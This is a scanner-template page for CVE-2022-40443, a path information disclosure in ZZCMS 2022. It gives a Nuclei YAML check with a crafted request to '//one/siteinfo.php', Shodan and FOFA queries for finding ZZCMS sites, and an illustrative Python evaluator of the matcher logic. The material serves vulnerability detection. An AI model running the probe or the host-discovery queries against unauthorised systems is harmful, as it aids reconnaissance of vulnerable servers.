ZZCMS 2022 - Path Information Disclosure
ID: CVE-2022-40443
Severity: low
Author: ritikchaddha
Tags: cve,cve22,zzcms,disclosure
Description
An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request.
YAML Source
id: CVE-2022-40443

info:
  name: ZZCMS 2022 - Path Information Disclosure
  author: ritikchaddha
  severity: low
  description: |
    An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request.
  impact: |
    An attacker can gain sensitive information about the server's file system.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://github.com/liong007/ZZCMS/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40443
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-40443
    cwe-id: CWE-22
    epss-score: 0.00103
    epss-percentile: 0.41353
    cpe: cpe:2.3:a:zzcms:zzcms:2022:*:*:*:*:*:*:*
  metadata:
    vendor: zzcms
    product: zzcms
    shodan-query: html:"zzcms"
    fofa-query: body="zzcms"
  tags: cve,cve22,zzcms,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}//one/siteinfo.php"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'class="titlebig'
          - 'zzcms'
          - 'siteinfo[-_]\d+\.html?'
        condition: and

      - type: word
        part: body
        words:
          - '暂无信息'
        negative: true
# digest: 4b0a00483046022100b6d3453a1e824d5d3823f7e59a821109a127e743febac62237213494dc5603120221008274e4dccbe4ba271b4d3a079fb75c7d6c2e30c570ee21facab02633ba750297:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability with the Nuclei scanner, which matches the patterns defined above against the target's response. Run it against a single target URL with:
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40443.yaml"
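The template above reports a finding only when both matchers agree: every regex in the first matcher must hit (condition: and) and the "no information" marker '暂无信息' must be absent (negative: true). The evaluator below, an added example that is not Nuclei's own code nor part of the template, re-implements exactly that matcher logic over response bodies saved to disk, so a defender can re-check a scanner finding offline and see which clause caused a match or a miss. The three sample bodies are constructed for illustration, not captured from any real host.

```python
import re

# Matchers transcribed from the template on this page; the evaluator itself
# is a hypothetical stand-in for Nuclei's matcher engine, not its real code.
MATCHERS = [
    {
        "type": "regex",
        "part": "body",
        "regex": [r'class="titlebig', r"zzcms", r"siteinfo[-_]\d+\.html?"],
        "condition": "and",
    },
    {
        "type": "word",
        "part": "body",
        "words": ["暂无信息"],
        "negative": True,
    },
]
MATCHERS_CONDITION = "and"


def eval_matcher(matcher: dict, body: str) -> bool:
    """Evaluate one Nuclei-style matcher against a response body.

    Per-pattern hits are combined with the matcher's own `condition`
    (Nuclei defaults to `or`), then inverted when `negative` is set.
    """
    if matcher["type"] == "regex":
        hits = [re.search(pattern, body) is not None for pattern in matcher["regex"]]
    elif matcher["type"] == "word":
        hits = [word in body for word in matcher["words"]]
    else:
        raise ValueError(f"unsupported matcher type: {matcher['type']}")

    combine = all if matcher.get("condition", "or") == "and" else any
    matched = combine(hits)
    return (not matched) if matcher.get("negative", False) else matched


def template_matches(body: str, matchers=MATCHERS, matchers_condition=MATCHERS_CONDITION) -> bool:
    """Apply `matchers-condition` across all matchers, as the template does."""
    results = [eval_matcher(m, body) for m in matchers]
    return all(results) if matchers_condition == "and" else any(results)


def explain(body: str) -> list:
    """Return a per-matcher breakdown so an analyst can see why a body matched or not."""
    return [(m["type"], eval_matcher(m, body)) for m in MATCHERS]


# Constructed sample bodies (not real responses):
# 1. page that shows the markers the template looks for, with real content
BODY_CONTENT = (
    '<html><body><div class="titlebig">zzcms</div>'
    '<a href="/one/siteinfo-12.html">item</a></body></html>'
)
# 2. same markers, but the site reports "no information" (negative matcher fires)
BODY_EMPTY = (
    '<html><body><div class="titlebig">zzcms</div>'
    '<a href="/one/siteinfo_3.html">x</a><p>暂无信息</p></body></html>'
)
# 3. an unrelated page with none of the markers
BODY_OTHER = "<html><body><h1>Welcome</h1></body></html>"


if __name__ == "__main__":
    for label, body in [("content", BODY_CONTENT), ("empty", BODY_EMPTY), ("other", BODY_OTHER)]:
        print(label, template_matches(body), explain(body))
```

Running the script prints a verdict and a per-matcher breakdown for each body; only the first sample satisfies the template, the second is rejected by the negative word matcher, and the third fails the regex matcher.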